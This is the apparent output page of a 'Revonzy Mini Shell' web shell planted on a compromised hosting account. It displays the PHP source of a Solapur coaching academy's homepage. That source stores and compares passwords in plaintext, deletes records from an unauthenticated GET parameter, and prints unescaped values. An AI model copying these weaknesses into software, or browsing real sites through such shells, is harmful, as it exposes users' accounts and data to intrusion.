Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/vsacademysolapur.in/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/vsacademysolapur.in/index12.php

<?php
    require_once("admin/lib/functions.php");
    $db = new login_function();
                    
    $flag   =   0;
    if(isset($_GET['delete_id']))
    {
        $delete_id  =   $_GET['delete_id'];
        
        if($db->delete_slider_images($delete_id))
        {
            $flag   =   1;
        }
    }

  if(isset($_POST['submit1']))
    {
        
        $full_name              = $_POST['full_name'];
        $number                 = $_POST['number'];
        $qualification          = $_POST['qualification'];
        $b_name                 = $_POST['b_name'];
        $city                   = $_POST['city'];
        $address                = $_POST['address'];
        $email                  = $_POST['email'];
        $password               = $_POST['password'];

                
    if($db->add_student_details($full_name,$number,$qualification,$b_name,$city,$address,$email,$password))
    {
     echo '<script type="text/javascript">alert("Thank For Registration!. Click Here to Login</script>';
    }
        
    }

    if(isset($_POST['login_page']))
    {
        $number          = $_POST['number'];
        $password               = $_POST['password'];
      
        $db_password            = $db->get_student_password($number);
      
        if($db_password=="")
        {
            $flag = 1;
        }
        if($flag == 0)
        {
            if($db_password==$password)
            {
            $_SESSION['current_login_student'] = $number;

            echo '<script>window.location.href = "contact.php";</script>'; 

            //header("location:../index.php");
                /*
                ?>
                <script>
                    window.location="dashboard.php";
                </script>
                <?php
                */
            }
            else
            {
                $flag = 2;
            }
        }
    }


?>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css"  />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <link rel="stylesheet" href="assets/css/header.css">
    <link rel="stylesheet" href="assets/css/style1.css">


    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>VS Academy</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Place favicon.ico in the root directory -->
    <link rel="shortcut icon" type="image/png" href="assets/images/icon/favicon.ico">
    <!-- all css here -->
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/font-awesome.min.css">
    <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
    <link rel="stylesheet" href="assets/css/magnific-popup.css">
    <link rel="stylesheet" href="assets/css/slicknav.min.css">
    <link rel="stylesheet" href="assets/css/typography.css">
    <link rel="stylesheet" href="assets/css/default-css.css">
    <link rel="stylesheet" href="assets/css/styles.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
    <!--color css-->
    <link rel="stylesheet" id="triggerColor" href="assets/css/triggerplate/color-0.css">
    <!-- modernizr css -->
    <script src="assets/js/vendor/modernizr-2.8.3.min.js"></script>
</head>
<body>
    <style type="text/css">
        .button-container {
    display: flex;
    gap: 20px;
}

/* Button Styles */
.btn {
    padding: 10px 20px;
    font-size: 16px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.3s ease;
}

/* Sign In Button */
.sign-in {
    background-color: #007bff;
    color: white;
}

.sign-in:hover {
    background-color: #0056b3;
}

/* Sign Up Button */
.sign-up {
    background-color: #28a745;
    color: white;
}

.sign-up:hover {
    background-color: #218838;
}
 .team-content a{
        
        padding:5px;
        border-radius:50px;
        border:2px solid #fff;
        color:white;
        font-size:17px;
        background: orange !important;
    }
    .team-content a:hover{
         color:orange;
         background-color: white !important;
       
    }
</style>
<?php require_once('header1.php') ?>
    <section class="section4">



            <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
            <!-- Optional: Include Font Awesome for carousel control icons -->
            <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
            <div id="heroCarousel" class="carousel slide" data-ride="carousel">
                <!-- Indicators -->
                <ol class="carousel-indicators">
                    <?php
                    $report_details = $db->get_all_slider_images();
                    if (!empty($report_details)) {
                        foreach ($report_details as $index => $record) {
                            $activeClass = ($index === 0) ? 'active' : '';
                            echo "<li data-target='#heroCarousel' data-slide-to='$index' class='$activeClass'></li>";
                        }
                    } else {
                        echo "<li data-target='#heroCarousel' data-slide-to='0' class='active'></li>";
                    }
                    ?>
                </ol>

                <!-- Wrapper for slides -->
                <div class="carousel-inner">
                    <?php
                    if (!empty($report_details)) {
                        foreach ($report_details as $index => $record) {
                            $id = $record[0];
                            $title = $record[1];
                            $images = $record[2];
                            $activeClass = ($index === 0) ? 'active' : '';
                            echo "
                            <div class='carousel-item $activeClass' style='background-image: url(\"admin/slider_images/$images\");'>
                                <div class='carousel-caption'>
                                    <h2>$title</h2>
                                </div>
                            </div>";
                        }
                    } else {
                        echo "<div class='carousel-item active'><div class='carousel-caption'><h3>No Data Found</h3></div></div>";
                    }
                    ?>
                </div>

                <!-- Controls -->
                <a class="carousel-control-prev" href="#heroCarousel" role="button" data-slide="prev">
                    <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                    <span class="sr-only">Previous</span>
                </a>
                <a class="carousel-control-next" href="#heroCarousel" role="button" data-slide="next">
                    <span class="carousel-control-next-icon" aria-hidden="true"></span>
                    <span class="sr-only">Next</span>
                </a>
            </div>

            <!-- jQuery -->
            <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
            <!-- Bootstrap JS -->
            <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
            <script>
                $(document).ready(function() {
                    $('.carousel').carousel({
                        interval: 6000,
                        pause: "false"
                    });

                    var $item = $('.carousel .carousel-item');
                    var $wHeight = $(window).height();

                    $item.height($wHeight); 

                    $(window).on('resize', function() {
                        $wHeight = $(window).height();
                        $item.height($wHeight);
                    });
                });
            </script>
    </section>
    <section class="section5">
        <div class="tab-div">
           <h4 class="q-link">Quick Links</h4>
           <div class="links">
                <a href="login.php">परीक्षा फॉर्म / Examination Form</a>
                <a href="#">माहिती पत्रक / Information sheet</a>
                <a href="login.php">हॉल तिकीट / hall Ticket</a>
                <a href="login.php">निकाल / Results</a>
           </div>
        </div>
    </section>


    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <!-- Optional: Include Font Awesome for carousel control icons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/css/bootstrap.min.css" rel="stylesheet">
    <div id="heroCarousel" class="carousel slide" data-ride="carousel">
        <!-- Indicators -->
        <ol class="carousel-indicators">
            <?php
            $report_details = $db->get_all_slider_images();
            if (!empty($report_details)) {
                foreach ($report_details as $index => $record) {
                    $activeClass = ($index === 0) ? 'active' : '';
                    echo "<li data-target='#heroCarousel' data-slide-to='$index' class='$activeClass'></li>";
                }
            } else {
                echo "<li data-target='#heroCarousel' data-slide-to='0' class='active'></li>";
            }
            ?>
        </ol>

        <!-- Wrapper for slides -->
        <div class="carousel-inner">
            <?php
            if (!empty($report_details)) {
                foreach ($report_details as $index => $record) {
                    $id = $record[0];
                    $title = $record[1];
                    $images = $record[2];
                    $activeClass = ($index === 0) ? 'active' : '';
                    
                }
            } else {
                echo "<div class='carousel-item active'><div class='carousel-caption'><h3>No Data Found</h3></div></div>";
            }
            ?>
        </div>

        <!-- Controls -->
        <a class="carousel-control-prev" href="#heroCarousel" role="button" data-slide="prev">
            <span class="carousel-control-prev-icon" aria-hidden="true"></span>
            <span class="sr-only">Previous</span>
        </a>
        <a class="carousel-control-next" href="#heroCarousel" role="button" data-slide="next">
            <span class="carousel-control-next-icon" aria-hidden="true"></span>
            <span class="sr-only">Next</span>
        </a>
    </div>

    <!-- jQuery -->
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <!-- Bootstrap JS -->
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script>
        $(document).ready(function() {
            $('.carousel').carousel({
                interval: 6000,
                pause: "false"
            });

            var $item = $('.carousel .carousel-item');
            var $wHeight = $(window).height();

            $item.height($wHeight); 

            $(window).on('resize', function() {
                $wHeight = $(window).height();
                $item.height($wHeight);
            });
        });
    </script>
    <!-- header area end -->
    <!-- offset search area start -->
    <div class="offset-search">
        <form action="#">
            <input type="text" name="search" placeholder="Sarch here...">
            <button type="submit"><i class="fa fa-search"></i></button>
        </form>
    </div>
    <!-- offset search area end -->
    <!-- body overlay area start -->
    <div class="body_overlay"></div>
    <!-- body overlay area end -->
    <!-- hero area start -->


    <!-- Controls -->
  <!--   <a class="carousel-control-prev" href="#heroCarousel" role="button" data-slide="prev">
        <span class="carousel-control-prev-icon" aria-hidden="true"></span>
        <span class="sr-only">Previous</span>
    </a>
    <a class="carousel-control-next" href="#heroCarousel" role="button" data-slide="next">
        <span class="carousel-control-next-icon" aria-hidden="true"></span>
        <span class="sr-only">Next</span>
    </a>
</div>
<style type="text/css">
    .carousel-item {
    background-size: cover; /* Ensures the image covers the carousel item */
    background-position: center; /* Keeps the image centered */
    height: 900px; /* Adjust this if you want the carousel item to be taller */
}

</style> -->

    <!-- hero area end -->
<section class="section-about">
        <style>
                .abt-right-thumb {
                    position: relative;
                    overflow: hidden;
                    border-radius: 10px;
                    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
                    cursor: pointer;
                }
                .abt-right-thumb img {
                    width: 100%;
                    height: auto;
                    display: block;
                    border-radius: 10px;
                }
                .abt-rt-inner {
                    position: absolute;
                    top: 50%;
                    left: 50%;
                    transform: translate(-50%, -50%);
                    width: 60px;
                    height: 60px;
                    background-color: rgba(0, 0, 0, 0.6);
                    border-radius: 50%;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                    opacity: 1;
                    transition: opacity 0.3s;
                }
                .abt-right-thumb:hover .abt-rt-inner {
                    opacity: 1;
                }
                .abt-rt-inner i {
                    color: #fff;
                    font-size: 24px;
                }
            </style>


        
</section>
<section>
    <style>
    .about-us-section {
            padding: 60px 0;
            background: #fff;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
           
            text-align: center;
            position: relative;
            overflow: hidden;
            width:100%;
        }
        .about-us-section::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100% !important;
            height: 100%;
            background: radial-gradient(circle at top left, rgba(0, 0, 0, 0.1), transparent);
            z-index: 0;
            opacity: 0.5;
        }
        .about-us-header h1 {
            font-size: 2.8rem;
            color: #0056b3;
            margin-bottom: 15px;
            z-index: 1;
            position: relative;
        }
        .about-us-header p {
            font-size: 1.2rem;
            color: #666;
            z-index: 1;
            position: relative;
        }
        .about-us-content {
            padding: 20px;
            z-index: 1;
            position: relative;
            display:flex
        }
        .about-us-content img {
            max-width: 100%;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            transition: transform 0.3s ease-in-out;
        }
        .about-us-content img:hover {
            transform: scale(1.05);
        }
        .about-us-content h2 {
            font-size: 2.2rem;
            color: #0056b3;
            margin-bottom: 20px;
        }
        .about-us-content p {
            font-size: 1.1rem;
            line-height: 1.7;
            color: #333;
            margin-bottom: 20px;
            text-align: left;
            max-width: 800px;
            margin-left: auto;
            margin-right: auto;
        }
        .highlight {
            font-weight: bold;
            color: #007bff;
        }
        @media (max-width: 768px) {
            .about-us-header h1 {
                font-size: 2rem;
            }
            .about-us-content h2 {
                font-size: 1.8rem;
            }
            .about-us-content p {
                font-size: 1rem;
            }
        }
    </style>

</section>
    <!-- about area start -->
    <div class="about-area-style2 ptb--120 ">
        <div class="container" >
            <div class="row">
                <div class="col-lg-8 " >
                    <div class="row1" style="display:flex;">
                         <div class="about-content-style2 has-color">
                        <div class="section-title-style mb-4">
              
                            <h2>Welcome to <b class="line-break"></b><span class="text-color">VS Academy</span> </h2>
                        </div>
                        <h2>Our Journey</h2>
                        <p>Since 2007, V-S Academy has been dedicated to nurturing the ambitions of students aspiring to careers in medicine and engineering. Each year, our students achieve remarkable results in prominent medical and engineering entrance examinations, including NEET, JEE, and MHT-CET. Over the years, we have consistently secured top ranks in various medical entrance exams. What began as a single center with just seven students has grown into one of the leading coaching institutes in Solapur.</p>
                        <p>We offer state-of-the-art facilities, including interactive smart boards, comprehensive topic-wise and sub-topic-wise test series, and in-depth discussion sessions. Our approach emphasizes customized, personalized attention to support the progress of each student.</p>
                        <div class="col-lg-9" style="width:900px;height:400px">
                                <div class="abt-right-thumb">
                                    <a href="assets/1.mp4" class="expand-video" target="_blank">
                                        <img src="assets/images/photos/vs-3.jpg" alt="Video Thumbnail">
                                        <div class="abt-rt-inner">
                                            <img src="assets/images/photos/play.png" alt="">
                                        </div>
                                    </a>
                                </div>
                        </div>
                    </div>
                    </div>
                    <!-- <div class="about-content-style2 has-color">
                        <div class="section-title-style mb-4">
              
                            <h2>Welcome to <b class="line-break"></b><span class="text-color">VS Academy</span> </h2>
                        </div>
                        <h2>Our Journey</h2>
                        <p>Since 2007, V-S Academy has been dedicated to nurturing the ambitions of students aspiring to careers in medicine and engineering. Each year, our students achieve remarkable results in prominent medical and engineering entrance examinations, including NEET, JEE, and MHT-CET. Over the years, we have consistently secured top ranks in various medical entrance exams. What began as a single center with just seven students has grown into one of the leading coaching institutes in Solapur.</p>
                        <p>We offer state-of-the-art facilities, including interactive smart boards, comprehensive topic-wise and sub-topic-wise test series, and in-depth discussion sessions. Our approach emphasizes customized, personalized attention to support the progress of each student.</p>
                        <div class="col-lg-9" style="width:900px;height:400px">
                                <div class="abt-right-thumb">
                                    <a href="assets/1.mp4" class="expand-video" target="_blank">
                                        <img src="assets/images/photos/vs-3.jpg" alt="Video Thumbnail">
                                        <div class="abt-rt-inner">
                                            <img src="assets/images/photos/play.png" alt="">
                                        </div>
                                    </a>
                                </div>
                            </div>
                    </div> -->
                </div>
            </div>
        </div>
        
<script src="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/js/bootstrap.bundle.min.js"></script>
    </div>
    <!-- about area end -->

  
    <!-- course area start -->
  <!--   <div class="course-area ">
        <div class="container">
            <div class="row">
                <div class="col-md-10 offset-md-1">
                    <div class="section-title-style2 black-title title-tb text-center">
                        <span>build your career</span>
                        <h2 class="primary-color">Featured Courses</h2>
                    </div>
                </div>
            </div>
  
            <div class="commn-carousel owl-carousel card-deck"> 
                <div class="card mb-5">
                    <div class="course-thumb">
                        <img src="assets/images/course/cs-img1.jpg" alt="image">
                        <span class="cs-price primary-bg">$150</span>
                    </div>
                    <div class="card-body  p-25"> 
                        <div class="course-meta-title mb-4">
                            <div class="course-meta-text">
                                <h4><a href="course-details.html">Application Design Course</a></h4>
                                <ul class="course-meta-stats">
                                    <li><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star-half"></i></li>
                                    <li>36 <i class="fa fa-comment"></i></li>
                                    <li>85 <i class="fa fa-heart"></i></li>
                                </ul>
                            </div> 
                            <a href="course-details.html"><img class="course-meta-thumbnail rounded-circle" src="assets/images/author/auth1.jpg" alt="image"> </a>
                        </div>
                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sciunt. Neque quisquam est, qui dolorem ipsum tatem.</p> 
                        <ul class="course-meta-details list-inline  w-100">
                            <li> 
                             <p>Course</p>
                             <span>3 Year</span>
                            </li>
                            <li>
                             <p>Class Size</p>
                              <span>18</span>
                            </li> 
                            <li>
                             <p>Duration</p>
                              <span>1 hour</span>
                            </li>      
                        </ul>  
                  </div>
                </div>
 
                <div class="card mb-5">
                    <div class="course-thumb">
                        <img src="assets/images/course/cs-img2.jpg" alt="image">
                        <span class="cs-price primary-bg">$150</span>
                    </div>
                    <div class="card-body  p-25"> 
                        <div class="course-meta-title mb-4">
                            <div class="course-meta-text">
                                <h4><a href="course-details.html">Data Structure & Algorithm</a></h4>
                                <ul class="course-meta-stats">
                                    <li><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star-half"></i></li>
                                    <li>36 <i class="fa fa-comment"></i></li>
                                    <li>85 <i class="fa fa-heart"></i></li>
                                </ul>
                            </div> 
                            <a href="course-details.html"><img class="course-meta-thumbnail rounded-circle" src="assets/images/author/auth1.jpg" alt="image"> </a>
                        </div>
                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sciunt. Neque quisquam est, qui dolorem ipsum tatem.</p> 
                        <ul class="course-meta-details list-inline  w-100">
                            <li> 
                             <p>Course</p>
                             <span>3 Year</span>
                            </li>
                            <li>
                             <p>Class Size</p>
                              <span>18</span>
                            </li> 
                            <li>
                             <p>Duration</p>
                              <span>1 hour</span>
                            </li>      
                        </ul>  
                  </div>
                </div>
  
                <div class="card mb-5">
                    <div class="course-thumb">
                        <img src="assets/images/course/cs-img3.jpg" alt="image">
                        <span class="cs-price primary-bg">$150</span>
                    </div>
                    <div class="card-body  p-25"> 
                        <div class="course-meta-title mb-4">
                            <div class="course-meta-text">
                                <h4><a href="course-details.html">Android App Development</a></h4>
                                <ul class="course-meta-stats">
                                    <li><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star-half"></i></li>
                                    <li>36 <i class="fa fa-comment"></i></li>
                                    <li>85 <i class="fa fa-heart"></i></li>
                                </ul>
                            </div> 
                            <a href="course-details.html"><img class="course-meta-thumbnail rounded-circle" src="assets/images/author/auth1.jpg" alt="image"> </a>
                        </div>
                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sciunt. Neque quisquam est, qui dolorem ipsum tatem.</p> 
                        <ul class="course-meta-details list-inline  w-100">
                            <li> 
                             <p>Course</p>
                             <span>3 Year</span>
                            </li>
                            <li>
                             <p>Class Size</p>
                              <span>18</span>
                            </li> 
                            <li>
                             <p>Duration</p>
                              <span>1 hour</span>
                            </li>      
                        </ul>  
                  </div>
                </div>
            </div> 
        </div>
    </div> -->
    <!-- course area end -->

  <!-- about area start -->
    <!-- <div class="about-area ptb--120" id="about">
        <div class="container">
            <div class="row">
                <div class="col-md-10 offset-md-1">
                    <div class="section-title-style2 black-title text-center">
                         <h2>About Us</h2>
                        <span>We’re dedicated to delivering exceptional [products/services], driven by passion, innovation, and a commitment to excellence.</span>
                       
                    </div>
                </div>
           
                <div class="col-lg-6">
                    <div class="about-left-content">
                        <div class="section-title"><!--  -->
                             <!-- <span class="text-uppercase">about us</span> --> -->
                            <!-- <h1>Welcome to</h1><h2> <span class="primary-color">V-S Academy</span></h2> 
                        </div>
                        <p style="text-align:justify;">Since 2007, VS Academy has been dedicated to nurturing the ambitions of students aspiring to careers in medicine and engineering. Each year, our students achieve remarkable results in prominent medical and engineering entrance examinations, including NEET, JEE, and MHT-CET. Over the years, we have consistently secured top ranks in various medical entrance exams.

                        What began as a single center with just seven students has grown into one of the leading coaching institutes in Solapur. We offer state-of-the-art facilities, including interactive smart boards, comprehensive topic-wise and sub-topic-wise test series, and in-depth discussion sessions. Our approach emphasizes customized, personalized attention to support the progress of each student.

                        We extend our sincere gratitude to our students and their parents for their trust and support in our efforts to provide exceptional     educational guidance.</p> -->
                        <!-- <a href="#" class="btn btn-primary btn-round">Read more</a> -->
                    <!-- </div>
                </div>
                <div class="col-lg-6">
                    <div class="abt-right-thumb">
                        <div class="abt-rt-inner">
                            <a class="expand-video" href="assets/1.mp4"><i class="fa fa-play"></i></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div> -->
    <!-- about area end -->
   <!-- events area start -->
   <!-- <div class="event-area pt--120 pb--80" id="courses">
    <div class="container">
        <div class="row">
            <div class="col-md-10 offset-md-1">
                <div class="section-title-style2 black-title text-center">
                    <span>Top-Tier Courses</span>
                    <h2>Our Courses</h2>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-md-6">
                <div class="media align-items-center mb-5">
                    <div class="media-head primary-bg">
                        <p>XI</p>
                    </div>
                    <div class="media-body">
                        <h4><a href="#">PCMB Coaching</a></h4>
                        <p><i class="fa fa-clock-o"></i>07:00 AM - 10:00 AM</p>
                    </div>
                </div> 
            </div>
            
            <div class="col-md-6">
                <div class="media align-items-center mb-5">
                    <div class="media-head primary-bg">
                        <p>XII</p>
                    </div>
                    <div class="media-body">
                        <h4><a href="#">PCMB Coaching</a></h4>
                        <p><i class="fa fa-clock-o"></i>10:30 AM - 01:30 PM</p>
                    </div>
                </div> 
            </div>

            <div class="col-md-6">
                <div class="media align-items-center mb-5">
                    <div class="media-head primary-bg">
                        <p>JEE</p>
                    </div>
                    <div class="media-body">
                        <h4><a href="#">JEE Preparation</a></h4>
                        <p><i class="fa fa-clock-o"></i>02:00 PM - 05:00 PM</p>
                    </div>
                </div> 
            </div>

            <div class="col-md-6">
                <div class="media align-items-center mb-5">
                    <div class="media-head primary-bg">
                        <p>NEET</p>
                    </div>
                    <div class="media-body">
                        <h4><a href="#">NEET Preparation</a></h4>
                        <p><i class="fa fa-clock-o"></i>05:30 PM - 08:30 PM</p>
                    </div>
                </div> 
            </div>
        </div>
    </div>
</div> -->
<!-- events area end -->


    <!-- take toure area start -->
    <!-- <div class="take-toure-area ptb--120">
        <div class="container">
            <div class="row">
                <div class="col-md-10 offset-md-1">
                    <div class="section-title-style2 white-title text-center">
                        <span>Take A Look</span>
                       <h2>Explore Our Video Gallery</h2>

                    </div>
                </div>
            </div>
            <div class="video-area">
                <a class="expand-video" href="assets/1.mp4"><i class="fa fa-play"></i></a>
            </div>
        </div>
    </div> -->
    <!-- take toure area end -->

  <!-- course area start -->
  <!-- <div id="gallary"></div>
<div class="teacher-area pb--100" >
    <div class="container">
        <div class="row" id="gallary">
            <div class="col-md-10 offset-md-1">
                <div class="section-title-style2 black-title title-tb text-center">
                    <span class="section-tagline">Our Best Gallary section</span>
                    <h2 class="primary-color">Gallary</h2>
                </div>
            </div>
        </div>
        <div class="commn-carousel owl-carousel card-deck">
            <?php
            $report_details = $db->get_all_gallery();
            if (!empty($report_details)) {
                foreach ($report_details as $record) {
                    $id = $record[0];
                    $title = $record[1];
                    $images = $record[2];
            ?>
                <div class="card mb-5">
                    <img src="admin/gallary_images/<?php echo htmlspecialchars($images, ENT_QUOTES, 'UTF-8'); ?>" alt="image" style="height: 250px;">
                    <div class="card-body teacher-content p-25">
                        <h4 class="card-title mb-4">
                            <a href="teacher-details.html"><?php echo htmlspecialchars($title, ENT_QUOTES, 'UTF-8'); ?></a>
                        </h4>
                    </div>
                </div>
            <?php
                }
            } else {
                echo "<p>No data found.</p>";
            }
            ?>
        </div> -->
        <!-- Add a horizontal line below the carousel -->
        <hr class="carousel-divider">
    </div>
</div>
<!-- course area end -->



</style>

<br><br><br>
<!-- Testimonial Area Start -->
<!-- <div class="testimonial-area ptb--120" id="">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 offset-lg-2 text-center">
                <div class="section-title mb-4">
                    <span class="text-uppercase primary-color mb-0">Happy Students</span>
                    <h2>What Our Students Say</h2>
                </div>
                <div class="tst-carousel owl-carousel">
                    <?php
                    
                    $report_details = $db->get_feedback_details();
                    if (!empty($report_details)) {
                        foreach ($report_details as $record) {
                            $id              = htmlspecialchars($record[0]);
                            $full_name       = htmlspecialchars($record[1]);
                            $email           = htmlspecialchars($record[2]);
                            $class           = htmlspecialchars($record[3]);
                            $college_name    = htmlspecialchars($record[4]);
                            $batch           = htmlspecialchars($record[5]);
                            $photo           = htmlspecialchars($record[6]);
                            $testimonial     = htmlspecialchars($record[7]);
                            $feedback_date   = htmlspecialchars($record[8]);
                            $feedback_time   = htmlspecialchars($record[9]);
                    ?>
                    <div class="testimonial-content pb--40">
                        <div class="testimonial-img mb-3">
                            <img src="feedback_images/<?php echo $photo; ?>" alt="Testimonial Image" class="rounded-circle shadow-lg">
                        </div>
                        <div class="testimonial-text bg-white p-4 rounded border border-light shadow-lg">
                            <h2 class="font-italic text-primary">“<?php echo $testimonial; ?>”</h3>
                            <h3 class="font-weight-bold mt-3 text-dark"><?php echo $full_name; ?></h4>
                            <span class="text-muted"><?php echo $class; ?> - <?php echo $college_name; ?> - <?php echo $batch; ?></span>
                        </div>
                    </div>
                    <?php
                        }
                    } else {
                    ?>
                    <div class="testimonial-content pb--40">
                        <div class="testimonial-text bg-white p-5 rounded border border-light shadow-lg">
                            <p style="font-size: 30px;">No feedback available at the moment.</p>
                        </div>
                    </div>
                    <?php
                    }
                    ?>
                </div>
            </div>
        </div>
    </div>
</div> -->
<!-- Testimonial Area End -->


    <!-- blog area start -->
    <!-- <div class="feature-blog  ptb--120"> -->
    <!--     <div class="container">
            <div class="row">
                <div class="col-md-10 offset-md-1">
                    <div class="section-title-style2 black-title title-tb text-center">
                        <span>Top stories</span>
                        <h2>Blog & News</h2>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="blog-carousel owl-carousel card-deck">                     
                  <div class="card mb-5"> 
                    <img class="card-img-top" src="assets/images/blog/blog-thumbnail1.jpg" alt="image">
                    <div class="card-body p-25"> 
                        <ul class="list-inline primary-color mb-3">
                            <li><i class="fa fa-clock-o"></i> AUGUST 6, 2017</li>
                            <li><i class="fa fa-comments"></i> 3 Comments</li>
                        </ul>
                      <h4 class="card-title mb-4"><a href="blog.html">The Death Of architechture</a></h4>
                      <p class="card-text">We’re a philosophical bunch here at School site and we have thought long and hard about.</p> 
                      <a class="btn btn-primary btn-round btn-sm" href="blog-details.html"> Read More </a>
                    </div>
                  </div>               
                  <div class="card mb-5"> 
                    <img class="card-img-top" src="assets/images/blog/blog-thumbnail2.jpg" alt="image">
                    <div class="card-body p-25"> 
                        <ul class="list-inline primary-color mb-3">
                            <li><i class="fa fa-clock-o"></i> AUGUST 6, 2017</li>
                            <li><i class="fa fa-comments"></i> 3 Comments</li>
                        </ul>
                      <h4 class="card-title mb-4"><a href="blog.html">Aenean id ullamcorper</a></h4>
                      <p class="card-text">We’re a philosophical bunch here at School site and we have thought long and hard about.</p> 
                      <a class="btn btn-primary btn-round btn-sm" href="blog-details.html"> Read More </a>
                    </div>
                  </div>
       
                  <div class="card mb-5"> 
                    <img class="card-img-top" src="assets/images/blog/blog-thumbnail3.jpg" alt="image">
                    <div class="card-body p-25"> 
                        <ul class="list-inline primary-color mb-3">
                            <li><i class="fa fa-clock-o"></i> AUGUST 6, 2017</li>
                            <li><i class="fa fa-comments"></i> 3 Comments</li>
                        </ul>
                      <h4 class="card-title mb-4"><a href="blog.html">The Death Of architechture</a></h4>
                      <p class="card-text">We’re a philosophical bunch here at School site and we have thought long and hard about.</p> 
                      <a class="btn btn-primary btn-round btn-sm" href="blog-details.html"> Read More </a>
                    </div>
                  </div>         
                  <div class="card mb-5"> 
                    <img class="card-img-top" src="assets/images/blog/blog-thumbnail1.jpg" alt="image">
                    <div class="card-body p-25"> 
                        <ul class="list-inline primary-color mb-3">
                            <li><i class="fa fa-clock-o"></i> AUGUST 6, 2017</li>
                            <li><i class="fa fa-comments"></i> 3 Comments</li>
                        </ul>
                      <h4 class="card-title mb-4"><a href="blog.html">The Death Of architechture</a></h4>
                      <p class="card-text">We’re a philosophical bunch here at School site and we have thought long and hard about.</p> 
                      <a class="btn btn-primary btn-round btn-sm" href="blog-details.html"> Read More </a>
                    </div>
                  </div>   
                </div>
            </div><

        </div> -->
    <!-- </div> <!-- blog area end --> -->

    <!-- cta area start -->
   <!--  <div class="cta-area secondary-bg has-color cta-area ptb--50 "> 
        <div class="container">
            <div class="row align-items-center">
                <div class="col-md-9">
                    <div class="cta-content">
                        <p class="mb-2">Click to Join the Advance Workshop</p>
                        <h2>Training in advance networking</h2>
                    </div>
                </div>
                <div class="col-md-3">
                    <div class="cta-btn">
                        <a class="btn btn-light btn-round" href="#">Join Now</a>
                    </div>
                </div>
            </div>
        </div>
    </div> -->
    <!-- cta area end -->

    <!-- footer area start -->
   <footer>
    <div class="footer-top has-color pt--120 pb--30">
        <div class="container">
            <div class="row">
                <div class="col-md-4">
                    <div class="widget widget-company">
                        <a href="index.php"><img src="assets/images/icon/images.png" alt="VS Academy Logo" style="width: 200px;border-radius: 10px;"></a>
                        <div class="address">
                            <h6>Office Address</h6>
                            <p>Paras Building, Near Hotel Zakas, Saat Rasta, Solapur</p>
                        </div>
                        <div class="address">
                            <h6>Business Phone</h6>
                            <p>+91 9096655180</p>
                            <p>+91 9890112009</p>
                        </div>
                        <div class="address">
                            <h6>Business Email</h6>
                            <p>vsacademy1983@gmail.com</p>
                        </div>
                        <ul class="social">
                            <li><a href="#"><i class="fa fa-facebook" style="color:white;"></i></a></li>
                            <li><a href="#"><i class="fa fa-twitter"></i></a></li>
                            <li><a href="#"><i class="fa fa-instagram"></i></a></li>
                            <!-- Add or remove social media links as needed -->
                        </ul>
                    </div>
                </div>
                <div class="col-md-3">
                    <div class="widget footer-link">
                        <h4 class="fwidget-title mb-5 pb-3 primary-color">Quick Links</h4> 
                        <ul>
                            <li><a href="#"><i class="fa fa-angle-right"></i>Courses</a></li>
                            <li><a href="#"><i class="fa fa-angle-right"></i>About Us</a></li>
                            <!-- <li><a href="#"><i class="fa fa-angle-right"></i>Success Stories</a></li> -->
                            <li><a href="#"><i class="fa fa-angle-right"></i>Feedback</a></li>
                            <li><a href="#"><i class="fa fa-angle-right"></i>Contact Us</a></li>
                            <li><a href="#"><i class="fa fa-angle-right"></i> Feedback</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-md-5">
                    <div class="widget widget-opening">
                        <h4 class="fwidget-title mb-5 pb-3 primary-color">About VS Academy</h4>
